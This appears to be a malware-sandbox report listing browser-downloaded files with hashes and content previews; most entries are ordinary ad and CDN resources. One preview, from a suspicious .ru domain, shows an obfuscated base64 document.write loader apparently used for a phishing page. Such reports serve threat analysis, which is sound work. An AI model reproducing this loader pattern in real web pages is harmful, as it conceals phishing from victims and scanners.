                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):99
                                                                                                                                                                                                                  Entropy (8bit):4.65421464125461
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9678626F482FA7FCB2EAAD1D6799E921
                                                                                                                                                                                                                  SHA1:089352B894BC99662DB2E87CE8161A09CB34ECDA
                                                                                                                                                                                                                  SHA-256:3D1C69568E0BA7A1F37D3BB213FFD156B89796C94B6551B96847609A6B166E7C
                                                                                                                                                                                                                  SHA-512:52DCBABCDCFDFB90C1B69E877D336CA41EC4444F91418680A55D7ABCEDF75298EA58D575B58F83A4150D78CBB826DBB0DDC296BB7EB16F60F53B5A738FCECBDC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"version":"v3","id":"amx*3*f40635db-dca3-40de-9df4-47b925a7ac2a*08b17ccc28422c2538145878e50aa866"}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):83
                                                                                                                                                                                                                  Entropy (8bit):4.595946022639116
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:739EF0C6CDEAA9609B2299055444CA2A
                                                                                                                                                                                                                  SHA1:0E7B52950D057E67E154327B941D78D72264DEAC
                                                                                                                                                                                                                  SHA-256:7743378EA26964E22C56102E7F9A454098671BA30CE3653C6DE48D290E8CF55D
                                                                                                                                                                                                                  SHA-512:A90CCB6F47AC6976CCEF637FBECB33CC228194BFB7EEEF5CB23AE084ECA5A1DE1527575440DE915643CD59539F21B374E444CE5C36AD1C5F4B7C9C79F50EE5C8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66bae12e060a4a66536126f26e6cf8
                                                                                                                                                                                                                  Preview:{"user":{"id":"497be9a1-bf56-4553-8c1f-c865ea1881fd-tuctdf983ae","isNewUser":true}}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1163212
                                                                                                                                                                                                                  Entropy (8bit):5.841551315527922
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:52C9B4F0A8CBE73AF38ECE4A9D12AA31
                                                                                                                                                                                                                  SHA1:7F9254A0F7F5AA3E4F5170DBFDE13E5C31E80800
                                                                                                                                                                                                                  SHA-256:33CD4406B8DA2955FD5501C60C51ADDD357C67F1F192C68F83B9FFB5086FB4D2
                                                                                                                                                                                                                  SHA-512:F3017084E9EA8F1231B9469F07844E21BBC436CFD24C617AB3C77E3EEB56F7EAC21952168740E3094D9A4DDA22AD649C2D4A178D432BE6E942702A945A37369A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"amazon;news;october-prime-day;fall;prime-day;shopping;shopping","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:6af55d48-c74c-4256-b3c7-d83c2f09aacb;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Amazon_%28company%29;Amazon_Prime\" ctopid=\"1878000;10610489\" hashtag=\"amazon;news;october-prime-day;fall;prime-day;shopping;1878000;10610489\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:6af55d48-c74c-4256-b3c7-d83c2f09aacb;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=amazon-prime-day-2024-the-best-early-deals-to-shop-ahead-of-the-october-big-deal-days-sale-143230701","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/amazon-prime-day-2024-the-
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8260), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):8260
                                                                                                                                                                                                                  Entropy (8bit):5.238261028208202
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DFA69F455EFA8A49A71AF52519927C3F
                                                                                                                                                                                                                  SHA1:07E3A5A50D74E9150408B2D5A50AE1242F6A5A33
                                                                                                                                                                                                                  SHA-256:6014DBEF5594ADD5F4104CE8597BC8C6B755E9DCA6B32E40EB04246E55588406
                                                                                                                                                                                                                  SHA-512:72673CB76FB5C77B570C44AD5A156DD634C9E57E8C1FF0845C9C021FA492061804FE07C7C8CBEEA8049C3644C4352C17A575903428C1ACC00255E38C27F4D010
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-autocomplete-1.31.8-modern-a4f31e10ae.chunk.js
                                                                                                                                                                                                                  Preview:webpackJsonpwafer_wafers_wafer_autocomplete([0],{"./src/types recursive ^\\.\\/.*$":function(e,t,r){function a(e){return r(s(e))}function s(e){var t=i[e];if(!(t+1))throw new Error("Cannot find module '"+e+"'.");return t}var i={"./aol-location":"./src/types/aol-location.js","./aol-location.js":"./src/types/aol-location.js","./aol-markets":"./src/types/aol-markets.js","./aol-markets.js":"./src/types/aol-markets.js","./aol-recipes":"./src/types/aol-recipes.js","./aol-recipes.js":"./src/types/aol-recipes.js","./gossip":"./src/types/gossip.js","./gossip.js":"./src/types/gossip.js","./sports-teams":"./src/types/sports-teams.js","./sports-teams.js":"./src/types/sports-teams.js","./weather":"./src/types/weather.js","./weather.js":"./src/types/weather.js"};a.keys=function(){return Object.keys(i)},a.resolve=s,e.exports=a,a.id="./src/types recursive ^\\.\\/.*$"},"./src/types/aol-location.js":function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),r.d(t,"getListMarkup",functi
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1695
                                                                                                                                                                                                                  Entropy (8bit):5.177312516380945
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:93DC53D369DCA8F09877C3ECC9A41DE3
                                                                                                                                                                                                                  SHA1:346D07BC2A3B65CD75CF0B3F938348969CA1A7C5
                                                                                                                                                                                                                  SHA-256:E689333AEAB6ADA00BE85106F30DEDD1E069EFCF70B78E13CE407CC04B1B1189
                                                                                                                                                                                                                  SHA-512:9D084CFA903CA9B6C253937B5F5628582C2080826124613CB5F70E6869ED472DF8541DF52E69DCDA55AFC11ED015BC0083DF5C1074717979544168F1E80ECB3E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. <linearGradient x1="11.357%" y1="56.982%" x2="74.1%" y2="26.47%" id="b">. <stop stop-color="#FFB92B" stop-opacity=".05" offset="0%"/>. <stop stop-color="#FF6900" offset="100%"/>. </linearGradient>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="c">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M29.428 9.083c-4.944.213-9.017 4.055-9.642 9.094a6.54 6.54 0 00-5.162.923c-1.899 1.144-3.201 3.098-3.552 5.33a7.336 7.336 0 00.435 3.706c.46 1.083 1.502 1.7
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 536x284, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):13186
                                                                                                                                                                                                                  Entropy (8bit):7.986095438785717
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:0197A05AD9746393FDC9A09926AF0078
                                                                                                                                                                                                                  SHA1:067B8B6D57531FAD6A5DD49FF2AD3E8902738F48
                                                                                                                                                                                                                  SHA-256:4EA7B2D4B156682642E7B5153CAA634ABCF11A6B120DA6B737888B6DD295112B
                                                                                                                                                                                                                  SHA-512:050B5141F1D903B33E843AACA2673CB73B72B8333455D1DA42C5A62675D4542014CAA79803003E8C236E41EF5850A917BA046E0EBAF6AD55FBFEB6994FC52BC1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/dPM1QCry4Q3rMY8hlUa66g--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/variety.com/82b019c076da40e29e1078982429cbe7.cf.webp
                                                                                                                                                                                                                  Preview:RIFFz3..WEBPVP8 n3..P....*....>y:.H..%*&.*.@..cnTO.NR..^...?..... .C.w..1...r..t.w..R9....6+...!...Z.|Hs.Z...=...|..../..v..O.^.b..*FV:.F.8....]U.,Y....'..<.ZG....../n./*...-..L`.G.ie.'........}..z...b...\k..(c.......4.v.B2g#.VS^..d...]..`."(....~..."@........JJ1.%u.QL.R.C..82.{B.....].z.H._..7.R+..u#.~,.+=.p...h...J..b}.k\.Y.a..Yi.._k7....k..b...tW..5ii-..v.B.F...%.......Na..........K..6c..6z'v...'. ...Wv.."..}.........i....0>...*..7ODaz....... .... ..UM..Z..6..K..%M.GIT.j~...)..h.SH<..x...qc......k..9.6w.10..*...$>..&3.P.V....*..=...P:.._.]...g..3=%e....}`..U/..(.}.=.}.....9.<.a..w.....w...}&.>.F..mcA.~A..1. l'.o...iY...S..Pz\..e..z...^.q..p.I.g.......J..=..S...7^Z%....E.h..[..p..&....Js.v...V.OQ.f...'.nN.7S4R~.bfX......u..L.Q.a#..%,?....>.C...........d.)x..@.=...q..R..d..N.f..h......r...q...Oi5q9/..V...j...[.w.Z....wv..s...r..._.o...Kc......H."I..#.7A0....&...|.u...../....s~!..V?i~....'E7..#..9:.q....}..$~..o...(xZ..* 2.y.,z...
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4821), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4821
                                                                                                                                                                                                                  Entropy (8bit):5.329638134706542
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9375DB7A6E23B64C7C951FB6A154ABC0
                                                                                                                                                                                                                  SHA1:060809DCDE56958FD0A1B5F32016929D35E57EEF
                                                                                                                                                                                                                  SHA-256:A07365A0569D5BAEE7129DB2DD7620148E751EA228A6183D71F2ACF6134925C6
                                                                                                                                                                                                                  SHA-512:43C432E432CDA01AA35C6B79CC88DBACA2BD4FD7DE8437BD46252684545688DDE4FDB817232805450BA73593DE6BC57A77BBF8B7753BB8CD963D61A273978151
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.9375db7a6e23b64c7c951fb6a154abc0.min.css
                                                                                                                                                                                                                  Preview:#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bds\(s\){border-style:solid}#atomic .Bdw\(1px\){border-width:1px}#atomic .Bdrs\(50\%\){border-radius:50%}#atomic .Bdrs\(80px\){border-radius:80px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bg\(\$shopping-caption-cont\){background:rgba(#7e1fff,.7);background:rgba(var(--hulk-pants),.7)}#atomic .Bgc\(--midnight\){background-color:#101518;background-color:var(--midnight)}#atomic .Bgc\(--white\){background-color:#fff;background-color:var(--white)}#atomic .Bxsh\(\$panelShadow\){box-shadow:0 2px 6px 0 rgba(0,0,0,.2);box-shadow:0 2px 6px 0 rgba(var(--rgb-black),.2)}.ad-content:hover .ad-content\:h_C\(\$streamBrandHoverClass\){color:#7e1fff!important;color:var(--hulk-pants)!important}#atomic .C\(--batcave\){color:#232a31;color:var(--batcave)}#atomic .C\(--inkwell\){color:#1d2228;color:var(--inkwell)}#atomic .C\(--malibu\){color:#ff0080;color:var(--malibu)}#a
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                  Entropy (8bit):2.9889227488523016
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:28D6814F309EA289F847C69CF91194C6
                                                                                                                                                                                                                  SHA1:0F4E929DD5BB2564F7AB9C76338E04E292A42ACE
                                                                                                                                                                                                                  SHA-256:8337212354871836E6763A41E615916C89BAC5B3F1F0ADF60BA43C7C806E1015
                                                                                                                                                                                                                  SHA-512:1D68B92E8D822FE82DC7563EDD7B37F3418A02A89F1A9F0454CCA664C2FC2565235E0D85540FF9BE0B20175BE3F5B7B4EAE1175067465D5CCA13486AAB4C582C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cm.adform.net/cookie?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1&redirect_url=https%3A%2F%2Fsync.a-mo.net%2Fsetuid%3FA%3Df40635db-dca3-40de-9df4-47b925a7ac2a%26bidder%3Dadform%26uid%3D%24UID
                                                                                                                                                                                                                  Preview:GIF89a.............,...........D..;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (6241), with CRLF line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):17305
                                                                                                                                                                                                                  Entropy (8bit):5.906168080416838
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DBE289D3001824EBC80DB2E50B3945A4
                                                                                                                                                                                                                  SHA1:2420AD6EA13B559F9C5C0D7EBCEFEDB90F858795
                                                                                                                                                                                                                  SHA-256:6CE05D2299EC82B1697EA60A11DF88A677A1D1A817F7CC2B8DC6F228C8D771B1
                                                                                                                                                                                                                  SHA-512:A2B1BD8CA1837D87C2F29264876320B76AA8F5C32AAD33DF94EC41501BA9D5EA01E9EFE5F78FC988171BE8E9B0065024D2D543B4AB9E3B5BB72067E4A7D65811
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://9wetjda.niavereinho.ru/QTnArt4/
                                                                                                                                                                                                                  Preview: Great leaders inspire action. -->..<script>../* Success is finding satisfaction in giving a little more than you take. */..if(atob("aHR0cHM6Ly85d0VUakRBLm5pYXZlcmVpbmhvLnJ1L1FUbkFydDQv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gPGRpdj5TdWNjZXNzIGlzIHdoZXJlIHByZXBhcmF0aW9uIGFuZCBvcHBvcnR1bml0eSBtZWV0LjwvZGl2PiAtLT4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy42LjAubWluLmpzIj48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jaGFsbGVuZ2VzLmNsb3VkZmxhcmUuY29tL3R1cm5zdGlsZS92MC9hcGkuanM/cmVuZGVyPWV4cGxpY2l0Ij48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvY3J5cHRvLWpzLzQuMS4xL2NyeXB0by1qcy5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+DQogICAgPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2luZGV4LCBub2ZvbGxvdyI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13a
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):52
                                                                                                                                                                                                                  Entropy (8bit):4.825251737288651
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:159A0B7E0AD052620C72E4A40DBD4500
                                                                                                                                                                                                                  SHA1:788C33C911B1FCEACE5679FE26D9AEF99A3749DC
                                                                                                                                                                                                                  SHA-256:A3ACF25812AD4787694086054C069A380CCF5A6CAE52324207633C12AD97280C
                                                                                                                                                                                                                  SHA-512:9EA586C8F0981FF99DCFAB16DF9A91240848CD533113CA771948D2611EFBDB0E0573D0B95713E44D9355720BC2E3F02F863E7CE9D4361D5188637EA36C315744
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHglDMFjFtnya3RIFDa0_TYESBQ3njUAOEgUNV3r3_Q==?alt=proto
                                                                                                                                                                                                                  Preview:CiMKCw2tP02BGgQIDBgBCgsN541ADhoECGQYAgoHDVd69/0aAA==
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (594)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5311
                                                                                                                                                                                                                  Entropy (8bit):5.046822701969818
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:BA0777792CE6C88CB6AC61D50F5ED420
                                                                                                                                                                                                                  SHA1:096E3337C3EB08177FC61F058A0A43FE7CC486EC
                                                                                                                                                                                                                  SHA-256:2CFC3D9F68235DCA692E8B8D70E2DE1F872D321133005C628D1306AC0D72F225
                                                                                                                                                                                                                  SHA-512:C8D17040A8966648EE790EB91235553096BCE4050814696A6F741A8E1C7EA9233EC2CC4005C3918B507B939D3E26A812212A40B87C6CD7CB7E414A627B52D066
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdn.taboola.com/scripts/prebid_iframe_sync.html?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                  Preview:<!doctype html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport". content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">. <meta http-equiv="X-UA-Compatible" content="ie=edge">. <title>Document</title>. <script type="text/javascript">."use strict";..function _slicedToArray(arr, i) { return _arrayWithHoles(arr) || _iterableToArrayLimit(arr, i) || _unsupportedIterableToArray(arr, i) || _nonIterableRest(); }.function _nonIterableRest() { throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }.function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o).slice(8, -1); if (n === "Object" && o.constructor) n = o.constructor.name; if (n === "Map" || n === "Set") return Array.from(o); i
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):125750
                                                                                                                                                                                                                  Entropy (8bit):5.815355710504371
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:375DA0BED327F6DD45D9643421C1FA43
                                                                                                                                                                                                                  SHA1:922D716A73AD1410F73268AAB045FEDFE8D572FF
                                                                                                                                                                                                                  SHA-256:18946507C8C6BAD1DE28DB6C7D8845C19CA3DE650339D66E0A1A821A0A9CEEA5
                                                                                                                                                                                                                  SHA-512:686BF573E55E6DDB1274AD2A0FF65CE39CD07F870D9026DA5CB24050F9BBF314F47714D6AA54937F967E68C2FBAD4641E0D2263D3BDF9B1788D6C00DDDECD70F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=383406480459021&correlator=3000874126986094&eid=31086814%2C31087775&output=ldjh&gdfp_req=1&vrg=202410020101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyhp%2Cmain%2Cdt%2Cus_yhp_main_dt_top_right%2Cus_yhp_main_dt_top_center%2Cus_yhp_main_dt_as_mid_right_a%2Cus_yhp_main_dt_as_mid_right_b&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5%2C%2F0%2F1%2F2%2F3%2F4%2F6%2C%2F0%2F1%2F2%2F3%2F4%2F7%2C%2F0%2F1%2F2%2F3%2F4%2F8&prev_iu_szs=300x250%7C300x600%2C970x250%7C3x1%7C728x90%2C300x250%2C300x250&ifi=1&sfv=1-0-40&fsfs=1%2C1%2C1%2C1&fsbs=1%2C1%2C1%2C1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1728052783565&adxs=951%2C147%2C951%2C951&adys=1262%2C209%2C2392%2C2142&biw=1263&bih=907&scr_x=0&scr_y=0&btvi=1%7C0%7C2%7C3&ucis=1%7C2%7C3%7C4&oid=2&u_his=2&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Fwww.yahoo.com%2F&ref=https%3A%2F%2F9wetjda.niavereinho.ru%2F&vis=1&psz=292x2558%7C1280x270%7C300x540%7C300x540&msz=292x600%7C1280x270%7C300x250%7C300x0&fws=4%2C2052%2C132%2C132&ohw=1263%2C1263%2C300%2C300&td=1&egid=28236&topics=1&tps=1&htps=10&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1728052765451&idt=14399&prev_scp=loc%3Dtop_right%7Cloc%3Dtop_center%7Cloc%3Dmid_right_a%7Cloc%3Dmid_right_b&cust_params=bucket%3DTNBE003%252CUSNELT-ReactInRMP-commerce-ctrl-1004%252Cseamless%26cobrand%3Dnone%26colo%3Dbf1%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfp%26ver%3Dmegastrm%26usercountry%3DUS%26pt%3Dhome%26spaceid%3D2023538075%26yrid%3D64cl5gdjfvvgt%26bka%3D0%26ay_floor_g%3Dmodel%2520not%2520loaded%26ay_floor_m%3Dmodel%2520not%2520loaded%26ay_floor_s%3Dmodel%2520not%2520loaded%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=1481106528%2C3690920304%2C3064630007%2C3845938001&frm=20&eoidce=1
                                                                                                                                                                                                                  Preview:{"/22888152279/us/yhp/main/dt/us_yhp_main_dt_top_right":["html",1,null,null,1,600,300,0,0,null,null,1,1,[["ID=2051a33f8e71a46a:T=1728052785:RT=1728052785:S=ALNI_MZDlovVKteKM-Dn3foLwC5dfdlQwg",1761748785,"/","yahoo.com",1],["UID=00000f21c80bac84:T=1728052785:RT=1728052785:S=ALNI_MZEiEZ9quEgTOcK5ddx0vPibWmjIw",1761748785,"/","yahoo.com",2]],[138472893855],[6692884752],[5335252228],[3455142215],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsmQzIF2wDuP5naPs4yMx-gT6Lf0u_foUqe4Kts49hyoBNnqMlC9AqXw60ugUcTKcGJDZVKUU0wDRnAJOFqIwynlTuGwa25AlSyfnzRivn1uZk_g","CJmIp6P69IgDFZk0vwQdvmwO5w",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,"AA-V4qOyOqtNGq8Zd49N004HUVPZboXVy9xKGX3s2zC9XJc0bcJpOxTkAReCxPBE0pjHnjQTS9KofS8",null,null,1,null,null,null,[["ID=ba3aafb9450526df:T=1728052785:RT=1728052785:S=AA-AfjYcdcftozQ4JQ0o0RSLpiQE",1743604785,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><b
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9985), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):9985
                                                                                                                                                                                                                  Entropy (8bit):5.39424531478431
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:E1026852C4E85D7DF641ED51990B2993
                                                                                                                                                                                                                  SHA1:41616AB4D20413CF3CE54A66A0CC9044E41E25A3
                                                                                                                                                                                                                  SHA-256:872722495556413DF2909833C48A7A9A8183F041700B150F222402B65E5F0307
                                                                                                                                                                                                                  SHA-512:47B4DED13C609E4ED227EED179FEDB2FDBF4CB91321AF0C47352FED8B8DA38282F44EA5423B778F5B90B48FDEFF3CA41083C8564B4D3114350DC1173B4A34721
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.css
                                                                                                                                                                                                                  Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(\$srchFujiDirtySeagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull,#e0e4e9)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdendc\(\#0057b8\)\:\:b::before{border-right-color:#0057b8}#atomic .Bdendc\(\$srchFujiHulkPants\)\:\:b::before{border-right-color:#7e1fff;border-right-color:var(--hulk-pants,#7e1fff)}#atomic .Bdbc\(\#5015b0\){border-bottom-color:#5015b0}.srchTGBlackFri .srchTGBlackFri_Bdbc\(\#000000\){border-bottom-color:#000!important}.srchTGCyberMon .srchTGCyberMon_Bdbc\(\#00873c\){border-bottom-color:#00873c!important}#atomic .Bdstartc\(\#7e1fff\){border-left-color:#7e1fff}.srchTGBlackFri .srchTGBlackFri_Bdstartc\(\#2c363f\){border-left-color:#2c363f!important}.srchTGCyberMon .srchTGCyberMon_Bdstartc\(\#009c94\){border-left-color:#009c94!important}#atomic .Bds\(s\){border-style:solid}#atomic .Bdends\(s\)\:\:b::before{border-right-style:solid}#atomic .Bdw\(1px\){border-width:1
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (24523), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):24523
                                                                                                                                                                                                                  Entropy (8bit):5.8084544879424875
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A97768E7170C6FA652B66383D4062177
                                                                                                                                                                                                                  SHA1:3A59479683DAB85E34B9BC00CDF7D3169E7484E9
